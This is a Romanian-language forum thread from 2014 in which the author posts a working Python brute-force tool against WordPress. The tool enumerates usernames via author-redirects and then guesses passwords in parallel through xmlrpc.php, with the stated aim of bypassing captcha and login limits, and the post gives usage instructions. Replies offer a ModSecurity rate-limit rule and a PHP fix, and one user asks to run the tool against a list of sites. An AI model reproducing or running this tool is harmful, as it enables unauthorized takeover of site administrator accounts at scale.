Active Members dancezar Posted October 17, 2014 Active Members Report Share Posted October 17, 2014 (edited) import urllib2import Queueimport threading,sysuseri=[]passwd=[]url=""work=0stiva=Queue.Queue()stiva_us=Queue.Queue()def login(domain,user,passs): xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>" re=urllib2.Request(domain,xml_post) try: ur=urllib2.urlopen(re) html=ur.read() if "Incorrect username" in html: return 0 elif "isAdmin" in html: return 1 elif "requested method " in html: print "[+] Modulul wp.getUsersBlogs e blocat!" exit() else: print "[!] unknow response" exit() except urllib2.URLError,e: print "[!] Erroare HTTP "+e.code() exit()def enum(j): global work,stiva,url,useri while work==1: try: i=stiva.get(False) try: r=urllib2.Request(url+"?author="+str(i)) u=urllib2.urlopen(r) redirect=u.geturl() if "/author/" in redirect: splited=redirect.split("/author/") us=splited[1].replace("/","") if us not in useri: useri.append(us) print us except urllib2.URLError,e: a=1 if stiva.empty(): return 0 except Queue.Empty: pass else: stiva.task_done()def brute(j): global bad,stiva_us,url,work while work==1: try: creds=stiva_us.get(False) rez=login(url,creds[0],creds[1]) print str(creds[0])+" "+str(creds[1]) if rez==1: print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1]) work=0 except Queue.Empty: pass else: stiva_us.task_done()url=sys.argv[1]passwd=open(sys.argv[3]).read().splitlines()th=[]th_br=[]work=1for i in range(4): t=threading.Thread(target=enum,args=(1,)) th.append(t) t.start()for i in range(12): stiva.put(i)for i in th: i.join()if len(useri)>0: print "[+] Am terminat de enumerat useri:"+str(len(useri)) print "[+] Incep bruteforce"else: print "[-] Nu s-au gasit useri voi incerca cu lista de useri" users=open(sys.argv[2]).read().splitlines() for user in users: useri.append(user) print "[+] 
Incep bruteforce"print "[+] Testez daca exista xmlrpc.php"r=urllib2.Request(url+"/xmlrpc.php")try: ur=urllib2.urlopen(r)except urllib2.URLError,e: print "[!] "+e.code()+" xmlrpc nu exista!" exit()work=1url+="/xmlrpc.php"for us in useri: for p in passwd: stiva_us.put((us,p))for t in range(int(sys.argv[4])): thr=threading.Thread(target=brute,args=(1,)) th_br.append(thr) thr.start()for t_j in th_br: t_j.join()print "[+] EXIT!"import urllib2 import Queue import threading,sys useri=[] passwd=[] url=" - Pastebin.com
Aveam nevoie de un bruteforcer pt wordpress care sa treaca de protectii precum captcha sau restrictie prin incercari repetate; mi-am amintit de un articol unde se prezenta acest concept si m-am apucat sa fac un bruteforcer in python (nu sunt foarte talentat la python, m-am apucat doar de 3 luni). Mai intai va incerca sa enumere useri (aici mai trebuie lucrat: nu scoate din titlu, ci doar din redirect), iar apoi va face bruteforce.
python wp_brute.py site.com userlist.txt passlist.txt NR_THREADS
Userlist.txt este necesar atunci cand nu a reusit sa enumere useri. Eu l-am incercat pe 2 site-uri la care am stiut deja parola si pe localhost si a mers.
Edited October 18, 2014 by danyweb09
gogusan Posted October 18, 2014
SecRule REQUEST_LINE "POST .*xmlrpc.*" \
    "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog,..." etc.
ups
dancezar (Author) Posted October 18, 2014
> SecRule REQUEST_LINE "POST .*xmlrpc.*" \
>     "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog,..." etc.
> ups
Inteleg ca maxim 600 de requesturi POST pentru xmlrpc; e cam de ajuns ca sa faci un bruteforce rapid. Singura metoda sigura sa eviti asta e:
<?php
add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );
function Remove_Unneeded_XMLRPC( $methods ) {
    unset( $methods['wp.getUsersBlogs'] );
    return $methods;
}
?>
badboy17 Posted October 18, 2014
Pot in loc de site.com sa adaug o lista de site-uri? Gen site.txt?
dancezar (Author) Posted October 18, 2014
Hmmm, interesant, am sa il fac maine sa mearga si asa... L-a incercat cineva asa, cu un single target?